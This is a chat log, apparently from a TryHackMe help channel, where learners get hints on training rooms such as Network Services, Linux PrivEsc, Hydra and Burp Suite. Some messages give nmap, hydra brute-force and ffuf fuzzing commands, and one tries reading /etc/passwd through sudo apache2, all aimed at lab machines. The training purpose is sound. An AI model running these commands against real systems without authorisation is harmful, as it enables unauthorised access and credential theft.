https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication Hopefully it helps.
hi, i am in the Network Service room in the enumeration telnet. i scan with nmap but all the ports are closed. what am i doing wrong?
you have your vpn connected?
i am with the attack box
!docs verify
share screenshot please
try giving 5-6 minutes after starting the machine
thats the thing!
how i can scan more ports?
how much port do i have to scan?
i am over 6000
now
lol
it can be even 9000
before that i used what i saw in a video nmap -A -p- <ip> -vv but i havent the patience then to wait. thinking it was a wrong way
less patience, add -T4
also tried
what it suppose to do?
Less time
thank you guys
see you
HI , the next question is what it can be used for.. i know that it suppose to be in the nmap details but i dont see anything special
do i have to scan in a different way?
-T1-5 is speed,
Just bear in mind the faster you are, the louder you are.
hence go crazy and send multiple thousands of packets a sec
hi, I'm currently doing Linux PrivEsc room, and trying to escalate my privileges by using "options" from apache2 program but I don't really figure it out..
I tried some basic commands based on what I was trying to do with other programs on the list, for example : "sudo apache2 -f /etc/passwd" or "sudo apache2 -C /bin/sh" and almost all other logical options from man page, but I'm just getting error messages without any root shell, I can't modify the config file in /etc/apache2/apache2.conf neither, any tips to do it ?
I did some research on internet, but nothing valuable in first page, and I'm sure it's not so hard doing it, I just need to use the right option, maybe something linked with interacting with a file or a path, similar to other program...
On which task? 6?
Yes, but I think I understood, I will not have a shell escape sequence with that program right ? But I can use it to access interesting files ?
I think they are just explaining how it works. I don't see that apache2 is installed on that VM.
I don't know if it's the meaning of "how you might use this program with sudo to gain root privileges without a shell escape sequence"
the hints of the last question says "play around with certain options the program has!" so it seems possible
and the program is effectively installed, I find it with tab completion
so basically, I think that I can use it to gain a root shell access
by properly using one of its option
I don't think that I need to use CVE or editing a config file, it's seem easier than that
my only way for now is to understand that I can't directly gain it, but is it the real answer ? I maybe deserved checking it on the internet to confirm my thinking
Apologies, I was looking at the wrong room. There are quite a few Linux PrivEsc rooms... I don't have time to check this other one. Maybe someone else can answer you.
It looks like it's a possibility, https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics check there for some more info. Hope it helps, good luck!
thanks, that's what I saw on writeups on internet, my thinking was the right, thanks !
i was doing simple ctf ... i got the cms login page and i have the python3 exploit script but the thing is that the script results are kinda useless so im stuck at "what is the password?" ... it would be great if someone give a hint ... thank u
Like passwords are like one word only and results r always changing
i am not really sure about python3, but i created python2 virtualenv and its working in my case.
I'm currently working on Attacktive Directory, and I can't get Kerbrute to work. it keeps telling me the KDCs cannot be found for the realm
very new to the hacking worlds so go easy on me if it's simple
I just used python 3 cuz it doesn't show any errors but i will try to fix python2 code by googling and will run again
scratch my question I figured it out, was just mistyping the --dc flag with only 1 -
Room: Metasploit: Exploitation
Task: 5
I'm unable to do a simple nmap scan on my target machine. I'm running kali locally and haven't experienced this issue before. I'm connected via OVPN but it cannot seem to scan the target ip since it says host is down. (It's not blocking ping) So far I've tried reinstalling OVPN, Reininating target machine and restarting pc but doesn't seem to do it.
Did you try adding -Pn like it said?
Yes, as mentioned it's not blocking ping requests.
Need help in the user agent part from agent sudo room
room:Nmap Basic Port Scans
Task:4 TCP Connect Scan
What is Nmap's guess about the newly installed service?
I searched for it in the task many times and searched for it in Google couldn't find the answer any where. I need at least a hint.
@burnt rivet thx
Gave +1 Rep to @burnt rivet
(uploading vulnerabilites) Once I've upload a shell on the site, how do I use it ?
I'll continue to search
thanks anyway
Gave +1 Rep to @burnt rivet
i am doing the hydra room. i have run the command to brute force the web password, however none of the potential passwords work. can someone help me please
what would you like a screenshot of?
the command
or output
ill try
im pretty sure i have?
ahh i just realized what you mean
ive changed the fail condition and its still not working
its giving out the same result
ive just figured it out
thank you for your help though
anyone know what this encoded string for in Pickle Rick room?
base64
Use magic in cyberchef
yea i know how it turns out but i wanna know what it is used for in that room
if u mean it's for login to|| portal.php||, there is another credential already and i completed the room without even the need of this encoded string
i completed it long ago but i just redo it again
I have question about a Linux Forensics for some room hints. I did figured it out but It cannot find it somewhere.
could you help me out for short question?
can u state your problem right away and don't ask for help like this so people can actually help
I am not asking to help. but I was not sure where the answer find on Task 6 and 7
Burp Suite: The Basics, Task 9
I can't even see an option that matches the answer format
so I'm not really sure which right-click menu this is referring to
This is the only right click menu I can find :(
Have you tried looking in the sub-menu ?
Yup
Then you'd have found the answer.
Right click brings up the menu, you're looking in one of the menus that branch off this menu.
Did you get it?
Yeah, I didn't really think that Do intercept response is the thing I need for some reason
Thanks!
hey I need help please
I am in room two, operating system security, but I don't understand what needs to be done
can you help me? please
Please keep it in English.
can you help me for a room please?
I got to operating system security, Task 3, but I can't
I can't figure out what I should do
yes but there are 3 questions, do I have to fill in some things in the Linux system?
I can not
to log in as Johnny
I tried to copy the 1st terminal but with the information on johnny
I found the passwords in the list but I can't log in
what terminal do i need to type in to be able to log in as johnny?
I only have the two terminals in example that I tried to copy on the attackbox
Hey for the Content Discovery module inside Jr Pen Testing, Has the OWASP favicon website been updated recently?
Essentially is the module up to date
Disregard
I need help in splunk101 task7
Highest evenID? Is it 22??
I got it. it should be all time
hi what the right formulation for nmap ? i am in enumeration telnet
i wrote -- nmap -A -T4 -p- 10.10.204.200 -vv
i dont see the name of the port that i suppose to see open
i saw scanning 10.10.209.200 [1 port]
it means one port open , no?
a really long one
but nothing about a list of port
is this the right formulation to get list of open ports>
?
ok so maybe i need to be patient
i know thats the reason i wrote the scan as it. to scan more ports
more than the 1000 first
oh!! thats it ! i got the port name
hello all, im on the hashing - crypto 101 room, and im trying to decrypt the hashes from the questions but im not being able to, it say i can use the rockyou list and kali but im not sure what i suppose to do, so for example i have the hash: $2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG
and already unzip the rockyou list but what im suppose to do now? do i need a library?
i already use hashid 'hash here' but wasn't what i was expected as i already know its from bcrypt
so for anyone that may have the same question you have to use hashcat, and select the wordlist at the end, after putting the hash
What skills would you guys say are necessary to complete Pickle Rick?
network enumeration, web enumeration and fuzzing, encoding, binary misconfiguration.
@hexed crescent thanks for the response gonna need to look at binary misconfiguration
Gave +1 Rep to @hexed crescent
hi, it says there is more than one path to root in this room https://tryhackme.com/room/relevant
but I couldn't find anyone using anything other than printspoofer
Hello everyone I'm trying to use my personal VM KALI to solve one of the Ctf from THM, but my Kali won't ping the ip no matter how much I try is there anything Else I should be doing and I'm missing or do anyone have an idea why my Kali won't be able to work for THM…would appreciate helpful advice thanks
I try to nmap too that won't work either
Nothing of such
and I will give this a try too thanks
Gave +1 Rep to @burnt rivet
I have a problem in attackbox
That the msfvenom command not found
And I don't what should I do for this problem
how to use burpsuite to create the php loads
What's your syntax?
Hello
Anyone here?
Okay. I'm in room Password Attacks task 5 it wanted me to use hashcat to crack a SHA1 hash, I did that and got a result but its not the value the question is looking for. And I double checked and used the right argument for SHA-1 -m100
the one u highlighted is the attempted password
Oh I see, haha well thanks
+rep @burnt rivet
Whats the rep thing? Should I be doing that?
u don't need to
Hi everyone, I'm doing the Network Services room and the assignment is to
Conduct an nmap scan of your choosing, How many ports are open?
I'm not understanding what it's asking me to nmap. I tried nmap the attackbox that started from that room but the answers aren't correct (10 open ports)
Yeah I started that
Oh yeah I was looking at the ip of my own attackbox sorry. Thanks for the help
Hello. I'm in the room Password Attacks on Task 8. It wants me to "generate a rules-based dictionary from a wordlist." I generated the wordlist "clinic.lst" and am I understanding the instructions right that it wants me to first create a custom rule in john.conf and then use that rule on the wordlist?
I'm taking a peek at these hints too
Please help me in solving file inclusion room challenge
Ask your question.
do u know username?
I guess
I got like 6 usernames to try
I dont know what to put in the last part of the command in the quotation marks
||hydra -L userlist -P password "/api/login:username=^USER^&password=^PASS^:wrong-login-message"||
the fail message after u login
oh I was missing the /api/login part
ty
u need to specify path for it
got it
I try to figure it out the room-hint.
Which room/task ?
(Room: Linux Forensics/Task 6)
(Room: Linux Forensics/Task 6) below what post it
Have you got the answer yet? I left to eat
I cannot find the answer yet.
I got the answer from the ||first screenshot.||
Maybe I miss something
LinuxStrengthTraining - Task 9, question 3.
I feel like either I'm missing a wordlist or the word is not in the wordlists. I suspect I'm missing a wordlist, I ran through all mine, tried all the matching characters (based on the number of * on the answer format hint) and none worked.
I even reversed them all and didn't find it
i think the service allow anonymous login.
what room are you on?
I know what it starts with... that's only 5 digits worth of brute forcing.............. hmmmmmmmmmmmm lol
thanks
will do
my notes are erm...
lacking
thanks
Found it. Sheesh, can't believe I missed that lol. Thank you.
Gave +1 Rep to @burnt rivet
What a strange word to try and say... reminds me of like... moist, or daddy
LinuxStrengthTraining - Task 9, question 4.
Is the hash in the user table for debian-sys-maint a rabbit hole?
nvm
CTF (beginners)task 1 , last question: anyone knows how to decode this:
LS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tL
Can you do base64 ?
I've tried. Show nothing
does it show something like this? ||----- .---- .---- ----- ----- ----- ----- -----||?
yes, looks like morse code
Correct
This is where I got stuck. From Morse code it's show binary and then the binary gives me nothing
!docs verify
share screenshot of your output
Hey there!
I could need a little hint.
Currently I am stuck in the File Inclusion room. I am supposed to "Now apply what we discussed, try to read files within the server, and figure out the directory specified in the include function and answer question #2 below."
I thought maybe I have to go through the list of file locations from the previous task to find the solution, but that didn't help so far.
Can someone of you maybe help me out here with a tip on what to do or what to google to solve the second question?
I am not sure how to get to the include function and check what directory is specified
make sure to read the hint
i actually forgot that there were hints, thanks
Gave +1 Rep to @cold eagle
i mean, it says include_path here, but that doesn't seem to be the answer at all
ohhh
now i see
you are solving lab1, you should solve lab2
dammit
thanks again :D I probably should learn how to read first. Cant believe this easy task costed me that long
Gave +1 Rep to @cold eagle
stuck on task 13 in burp suite basics. im not sure what to look for, the hint say a page made up of series of number and letters?
i just dont see it
check the sitemap section in burp... then click the links around on the website while being connected to the burp proxy( you can leave intercept off but still be connected to the proxy) after a while you should get a result in the sitemap while doing that that is a random word/string of chars.... visiting that page will give you the flag
GOTIT! THNX BRO
no problem
Ah, I posted the wrong screenshot of this question hint on Task 6 in Linux Forensics.
never mind
I found the answer on Task 6
hey can anyone help me out with this error im getting in Jr pentesting -> introduction to web hacking -> subdomain enumeration -> task 6.
i keep entering the command exactly as its given but the results im getting keep saying error. i looked on the forum post posts and it looked like alot of other people had the same error but i did not find a solution that worked there. anyone whos done it got any hints?
Are you using the Attackbox?
Or a VM?
attack box
yes
you're not verified, and I meant in here, not dm's
it might need a min or something i put in my token
In the DM, what happens when you hit enter?
it prints the stuff above it
i just had it typed there so u could see what i had typed
Strange
Try this
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.254.234 -fs 2593
yeah still giving me the same thing @lucid junco
You're on the attackbox, yes?
You could try terminating the attack box and starting a new one
I mean, your target works on my attackbox lol
i dont understand why its like this ;-;;;
wat the absolute fk
how does that even work
im nearly lost my damn mind
omg now im looking closely i see it. i feel so dumb XD
thanks for the help tho, both of yall
Gave +1 Rep to @lucid junco
+rep @burnt rivet
Gave +1 Rep to @burnt rivet
I'll need to remember about the terminal size
You need to tag them.
- @lucid junco
Gave +1 Rep to @lucid junco
- @burnt rivet
just me or the machines are really slow rn?
welp
openvpn
can barely connect with that too
nah it was all good
but a nice script to have
keeps interrupting the connection
I was running gobuster
and it kept disconnecting from the target
and now I closed my openvpn and took a while to connect
instead of being instant
probs gonna restart my laptop
well now it works so nvm
please I can't get into the ROM (Zero Logon) to solve it and this wastes my time a lot. Please reply
Burp Suite: Repeater stuck all i get is 404 ? How am i messing up?
ill take a ss one sec
ok good got it
ah ok
but i did enter 1000 as the hint said or simple but got the same results is so is the proxy is on or should it be off?
sorry simble*
For example, instead of a number you could enter a piece of text, or a symbol. Alternatively, you could try entering a number greater than the number of products available (e.g. 1000), or a number less than or equal to 0
of course
ill try again
nope
let me restart from scratch mayb its borked idk